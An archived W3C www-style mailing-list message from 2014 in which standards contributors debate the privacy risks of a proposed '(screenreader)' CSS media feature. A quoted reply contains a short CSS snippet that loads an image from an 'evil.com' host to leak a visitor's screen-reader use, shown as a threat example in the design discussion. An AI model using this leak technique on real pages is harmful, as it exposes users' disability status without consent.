W3C home > Mailing lists > Public > www-style@w3.org > December 2014

Re: [css-speech][css-content][mediaqueries] Making Generated Content Accessible

From: James Craig <jcraig@apple.com>
Date: Tue, 2 Dec 2014 13:58:47 -0800
Cc: fantasai <fantasai.lists@inkedblade.net>, Alan Stearns <stearns@adobe.com>, www-style list <www-style@w3.org>, "Tab Atkins Jr." <jackalmage@gmail.com>, fantasai <fantasai@inkedblade.net>
Message-Id: <944081B4-1B48-4DFB-AD6F-637103278F6B@apple.com>
To: Florian Rivoal <florian@rivoal.net>

> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy an personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors form doing this:
> <style>
> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
> </style>
> <div id=“snoop”></div>

That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.

From the spec:

To avoid privacy concerns, User Agents MUST immediately return the default value for any restricted features that will result in a user prompt. If and when the user chooses to share settings from the relevant category with the requesting page, the web page author can handle a user setting change callback, or make a subsequent request to the userSetting() method of the Window object.

Received on Tuesday, 2 December 2014 21:59:16 UTC

This archive was generated by hypermail 2.4.0 : Friday, 25 March 2022 10:08:49 UTC